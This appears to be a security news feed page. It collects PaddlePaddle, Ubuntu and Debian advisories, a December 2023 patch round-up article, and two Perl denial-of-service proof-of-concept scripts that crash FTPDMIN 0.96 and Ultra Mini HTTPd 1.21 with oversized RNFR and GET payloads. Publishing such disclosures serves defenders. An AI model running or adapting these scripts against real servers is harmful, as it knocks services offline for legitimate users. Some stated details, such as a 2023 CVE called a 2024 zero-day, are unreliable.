Nullptr in paddle.nextafter in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.





**PaddlePaddle null pointer dereference in paddle.nextafter**

Moderate severity GitHub Reviewed Published Jan 3, 2024 to the GitHub Advisory Database • Updated Jan 3, 2024

GHSA-547m-23x7-cxg5: PaddlePaddle null pointer dereference in paddle.nextafter

OOB access in paddle.mode in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.





**PaddlePaddle segfault in paddle.mode**

Moderate severity GitHub Reviewed Published Jan 3, 2024 to the GitHub Advisory Database • Updated Jan 3, 2024

GHSA-mr78-v55p-7777: PaddlePaddle segfault in paddle.mode

Nullptr in paddle.put_along_axis in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.





**PaddlePaddle segfault in paddle.put\_along\_axis**

Moderate severity GitHub Reviewed Published Jan 3, 2024 to the GitHub Advisory Database • Updated Jan 3, 2024

GHSA-2wcj-qr76-9768: PaddlePaddle segfault in paddle.put_along_axis

FPE in paddle.nanmedian in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.





**PaddlePaddle floating point exception in paddle.nanmedian**

Moderate severity GitHub Reviewed Published Jan 3, 2024 to the GitHub Advisory Database • Updated Jan 3, 2024

GHSA-xjpw-hx47-rccv: PaddlePaddle floating point exception in paddle.nanmedian

Ubuntu Security Notice 6563-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. Marcus Brinkmann discovered that Thunderbird did not properly parse a PGP/MIME payload that contains digitally signed text. An attacker could potentially exploit this issue to spoof an email message.

    =========================================================================Ubuntu Security Notice USN-6563-1January 02, 2024thunderbird vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code.(CVE-2023-6857, CVE-2023-6858,CVE-2023-6859, CVE-2023-6861, CVE-2023-6862, CVE-2023-6863, CVE-2023-6864)Marcus Brinkmann discovered that Thunderbird did not properly parse a PGP/MIMEpayload that contains digitally signed text. An attacker could potentiallyexploit this issue to spoof an email message. (CVE-2023-50762)Marcus Brinkmann discovered that Thunderbird did not properly compare thesignature creation date with the message date and time when using digitallysigned S/MIME email message. An attacker could potentially exploit thisissue to spoof date and time of an email message. (CVE-2023-50761)DoHyun Lee discovered that Thunderbird did not properly manage memory whenused on systems with the Mesa VM driver. An attacker could potentiallyexploit this issue to execute arbitrary code. (CVE-2023-6856)Andrew Osmond discovered that Thunderbird did not properly validate thetextures produced by remote decoders. An attacker could potentially exploitthis issue to escape the sandbox. (CVE-2023-6860)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.6.0+build2-0ubuntu0.23.10.1Ubuntu 23.04:  thunderbird                     1:115.6.0+build2-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:115.6.0+build2-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.6.0+build2-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6563-1  CVE-2023-50761, CVE-2023-50762, CVE-2023-6856, CVE-2023-6857,  CVE-2023-6858, CVE-2023-6859, CVE-2023-6860, CVE-2023-6861,  CVE-2023-6862, CVE-2023-6863, CVE-2023-6864Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6563-1

Ubuntu Security Notice 6562-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. DoHyun Lee discovered that Firefox did not properly manage memory when used on systems with the Mesa VM driver. An attacker could potentially exploit this issue to execute arbitrary code.

    =========================================================================Ubuntu Security Notice USN-6562-1January 02, 2024firefox vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code.(CVE-2023-6865,CVE-2023-6857, CVE-2023-6858, CVE-2023-6859, CVE-2023-6866, CVE-2023-6867,CVE-2023-6861, CVE-2023-6869, CVE-2023-6871, CVE-2023-6872, CVE-2023-6863,CVE-2023-6864, CVE-2023-6873)DoHyun Lee discovered that Firefox did not properly manage memory when usedon systems with the Mesa VM driver. An attacker could potentially exploitthis issue to execute arbitrary code. (CVE-2023-6856)George Pantela and Hubert Kario discovered that Firefox using multiple NSSNIST curves which were susceptible to a side-channel attack known as"Minerva". An attacker could potentially exploit this issue to obtainsensitive information. (CVE-2023-6135)Andrew Osmond discovered that Firefox did not properly validate the texturesproduced by remote decoders. An attacker could potentially exploit thisissue to escape the sandbox. (CVE-2023-6860)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         121.0+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6562-1  CVE-2023-6135, CVE-2023-6856, CVE-2023-6857, CVE-2023-6858,  CVE-2023-6859, CVE-2023-6860, CVE-2023-6861, CVE-2023-6863,  CVE-2023-6864, CVE-2023-6865, CVE-2023-6866, CVE-2023-6867,  CVE-2023-6869, CVE-2023-6871, CVE-2023-6872, CVE-2023-6873Package Information:  https://launchpad.net/ubuntu/+source/firefox/121.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6562-1

Debian Linux Security Advisory 5593-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5593-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 01, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-6531 CVE-2023-6622 CVE-2023-6817 CVE-2023-6931  
                 CVE-2023-51779 CVE-2023-51780 CVE-2023-51781 CVE-2023-51782

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-6531

    Jann Horn discovered a use-after-free flaw due to a race condition  
    problem when the unix garbage collector's deletion of a SKB races  
    with unix_stream_read_generic() on the socket that the SKB is  
    queued on.

CVE-2023-6622

    Xingyuan Mo discovered a flaw in the netfilter subsystem which may  
    result in denial of service or privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6817

    Xingyuan Mo discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6931

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system which may result in  
    denial of service or privilege escalation.

CVE-2023-51779

    It was discovered that a race condition in the Bluetooth subsystem  
    in the bt_sock_ioctl handling may lead to a use-after-free.

CVE-2023-51780

    It was discovered that a race condition in the ATM (Asynchronous  
    Transfer Mode) subsystem may lead to a use-after-free.

CVE-2023-51781

    It was discovered that a race condition in the Appletalk subsystem  
    may lead to a use-after-free.

CVE-2023-51782

    It was discovered that a race condition in the Amateur Radio X.25  
    PLP (Rose) support may lead to a use-after-free.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.69-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWSuDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q7/g//Ski3EY0dL0SNhIWCSVOA01f4rZbW8e+65GpQofJtckBb2Wk1ZyMb+eLv  
U5aRfscn7DC2J0BiX+/JjaboTx880WcUQw5csbSzb2bEGhsHBwHkCG31qaTs5ekG  
XH654gBja/FmGZOvQ+YwoglDMCbCiSrUs7fwe3kPhlr3XRHs2ZdezKrOQ3m2bo7g  
xnA7UwB+5xwbbnweYkmKxtowM+x4XUDsr43/YR+mbeULzprGQGbyxsi8txKJQ8d+  
xqyxCl5zki3dF/baBhBLPMH26GUs6fGsplhht9ecUcKXiNeyYLBX6Aepb4YDEgKN  
o0tBDPVundFPxyQzr8qMfdB0w6+4U2z+QavV/OCziNIKXbnrNUMpjF6Pks+geneY  
R+ut1KWHVkOJsAgI3mGrLd+tjPSEsdUB2EJhlFWpF9XJnBD3KV9xPVOBN3ZjL1+o  
t/ow/5XV+LZTihUQ37stcJRnl5U1CGWlBWbUonc++eGbCAvFNaV6gTfADWyz+/6W  
z5eKFZpj678AFr5RbkgF2earJUT0iC3vgtKMTiEsxNoRMZgVOu8iiekX+gpWBkdt  
2w+dAAu8VFixQ5/Sl8LDYCFkP8xrtf31XiNBsrMZzxJDfMtNYMi++iQXSW8LyoL/  
JqbEQibQU57ls29SbvoweKCnK1GgBfhrqqGAk7/Pnax0yuK4z4M=9GI7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5593-1

FTPDMIN version 0.96 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 2024-01-01  
# Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/  
# Download to demo:  
https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing  
# Notification vendor: Yes reported  
# Tested Version: FTPDMIN 0.96  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2  
and 3 (English).  
#For this exploit I have tried several strategies to increase reliability  
and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via  
FTP command RNFR.  
#The following request sends a large amount of data to the FTP server to  
process across command RNFR, the server will crash as soon as it is  
received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash  
the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

    intro();  
    main();

    print "[+] Exploiting... \n";

    my $buf = "\x41"x269;  
    my $point = "\x45\x2a\x42\x7b";  
    my $buf2 = "\x41"x126;

    my $payload = "RNFR ".$buf . $point . $buf2;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to  
server: $@";

    $ftp->login("anonymous",'anonymous');

    $ftp->quot($payload);

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

   sub intro {  
      print "***************************************************\n";  
      print "*         FTPDMIN 0.96 - Denied of Service        *\n";  
      print "*                                                 *\n";  
      print "*            Coded by Fernando Mengali            *\n";  
      print "*                                                 *\n";  
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";  
      print "*                                                 *\n";  
      print "***************************************************\n";  
  }

  sub main {

      our ($ip) = @ARGV;

      unless (defined($ip)) {

        print "             \nUsage: $0 <ip>                   \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

FTPDMIN 0.96 Denial Of Service

Ultra Mini HTTPd version 1.21 suffers from a denial of service vulnerability.

    # Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 2024-01-01# Vendor Homepage: https://acme.com/# Software Link: https://acme.com/# Notification vendor: Yes reported# Tested Version: Ultra Mini HTTPd 1.21# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via GET.#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";    my $buffer = "\x41"x192;    my $payload = 'A' x 5438 . $buffer;    my $i=0;    while (i < 1) {        my $socket = IO::Socket::INET->new(        PeerAddr => $ip,        PeerPort => $port,        Proto    => 'tcp',    ) or die "Can't connect!!!!! \n\n";    my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";    $socket->send($payload);    close($socket);    $i++;    }      print "[+] Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*    Ultra Mini HTTPd 1.21 - Denied of Service    *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {      our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated.

Ultra Mini HTTPd 1.21 Denial Of Service

Plus: Apple shuts down a Flipper Zero Attack, Microsoft patches more than 30 vulnerabilities, and more critical updates for the last month of 2023.

December was a hectic month for updates as firms including Apple and Google rushed to get patches out to fix serious flaws in their products before the holiday break.

Enterprise software giants also issued their fair share of patches, with Atlassian and SAP squashing several critical bugs during December.

Here’s what you need to know about the important updates you might have missed during the month.

Apple iOS

In mid-December, Apple released iOS 17.2, a major point upgrade containing features such as the Journal app, as well as 12 security patches. Among the flaws fixed in iOS 17.2 is CVE-2023-42890, an issue in the WebKit browser engine that could allow an attacker to execute code.

Another flaw in the iPhone’s Kernel, tracked as CVE-2023-4291, could see an app break out of its secure sandbox, Apple wrote on its support page. Meanwhile, two vulnerabilities in ImageIO, CVE-2023-42898 and CVE-2023-42899, could lead to code execution.

The iOS 17.2 update also put a mechanism in place to prevent a Bluetooth attack using a penetration testing device called Flipper Zero, according to tests by ZDNET and 9to5Mac. The annoying denial of service cyber-assault could cause a flurry of pop ups to appear on an iPhone and eventually lock up the device.

Apple also released iOS 16.7.3, Safari 17.2, macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2, tvOS 17.2 and watchOS 10.2.

Just one week after releasing iOS 17.2, Apple issued iOS 17.2.1 and iOS 16.7.4 for older devices, alongside macOS Sonoma 14.2.1. The surprise iPhone update contains unspecified bug and security fixes, while the macOS patch fixes a single flaw tracked as CVE-2023-42940.

Google Android

The Google Android December Security Bulletin was a hefty one, fixing nearly 100 security issues. The update includes patches for two critical issues in the Framework, the most severe of which could lead to remote escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation, Google said.

CVE-2023-40088 is a critical flaw in the System that could lead to remote code execution, while CVE-2023-40078 is an elevation of privilege bug rated as having a high impact.

Google has also issued an update for its smart device WearOS platform, fixing CVE-2023-40094, an elevation of privilege flaw. The Pixel Security Bulletin has not been posted at the time of writing.

Google Chrome

Google ended a bumper December of updates in style with an emergency fix for its Chrome browser. The eighth zero-day vulnerability impacting Chrome in 2024, CVE-2023-7024 is a heap buffer overflow issue in the open source WebRTC component. Google is “aware that an exploit for CVE-2023-7024 exists in the wild,” the browser maker said in an advisory.

It wasn’t the first fix released by Google in December. The software giant also issued a Chrome patch mid-month to fix nine security issues. Of the flaws reported by external researchers, five are rated as having a high severity, including CVE-2023-6702, a type confusion flaw in V8, and four use-after-free bugs.

Earlier in the month Google released Chrome 120, fixing 10 security flaws, including two rated as having a high severity. CVE-2023-6508 is a use-after-free bug in Media Stream, while CVE-2023-6509 is a use-after-free issue in Side Panel Search.

Microsoft

Microsoft’s December Patch Tuesday fixes over 30 vulnerabilities including several remote code execution (RCE) flaws. Among the critical fixes is CVE-2023-36019, a spoofing vulnerability in Microsoft Power Platform Connector with a CVSS score of 9.6. The issue could see an attacker manipulate a malicious link, app, or file to trick the victim. However, you would have to click on a specially crafted URL to be compromised.

Meanwhile, CVE-2023-35628 is a Windows MSHTML Platform RCE bug rated as critical with a CVSS score of 8.1. “The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client,” Microsoft said, adding that this could lead to exploitation before the email is viewed in the Preview Pane.

It was a fairly light Patch Tuesday, and none of the issues fixed in the month’s update cycle are known to have been exploited, but it still makes sense to apply the fixes as soon as you can.

Mozilla Firefox

Mozilla has fixed 18 security vulnerabilities in its Firefox browser, a third of which are rated as having a high severity. Of these, CVE-2023-6856 is a heap-buffer-overflow issue affecting WebGL DrawElementsInstanced method with Mesa VM driver that could allow an attacker to perform remote code execution and sandbox escape.

Meanwhile, Mozilla has also fixed memory safety bugs tracked as CVE-2023-6864 and CVE-2023-6873. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

Apache

The Apache Software Foundation has issued a patch for a flaw in its Struts 2 open source developer framework. Tracked as CVE-2023-50164, the issue is rated as critical with a CVSS score of 9.8.

Using the vulnerability, an attacker could manipulate file upload parameters to enable paths traversal. Under some circumstances, this could lead to uploading a malicious file and be used to perform RCE, according to a security advisory.

To fix the flaw, it’s important to upgrade to Struts 2.5.33 or Struts 6.3.0.2 as soon as possible.

Atlassian

Enterprise software giant Atlassian has issued a patch to fix critical RCE vulnerabilities in its Confluence Data Center and Server. Tracked as CVE-2023-22522, the template injection vulnerability allows an authenticated attacker to inject unsafe user input into a Confluence page. “Using this approach, an attacker is able to achieve RCE on an affected instance,” Atlassian said in an advisory.

Marked as critical with a CVSS score of 9, the bug affects all versions including and after 4.0.0 of Confluence Data Center and Server. Atlassian “recommends patching to the latest version or a fixed LTS version” to address the issue.

Other patches released by Atlassian during the month include a fix for an RCE vulnerability in the Atlassian macOS app, an RCE bug in Assets Discovery, and a SnakeYAML library RCE issue impacting multiple products.

SAP

Business software maker SAP has released its December Security Patch Day, fixing several serious security flaws. The most critical, with a CVSS score of 9.1, are four escalation-of-privilege bugs in SAP Business Technology Platform tracked as CVE-2023-49583, CVE-2023-50422, CVE-2023-50423, and CVE-2023-50424.

“It allows an unauthenticated attacker to obtain arbitrary permissions within the application leading to high impact on the application’s confidentiality and integrity,” security firm Onapsis said.

Meanwhile, CVE-2023-42481 is an improper access control vulnerability in SAP Commerce Cloud with a CVSS score of 8.1. “This allows a user who is actually blocked to regain access to the application, leading to considerable impact on confidentiality and integrity,” according to Onapsis.

Tag

#dos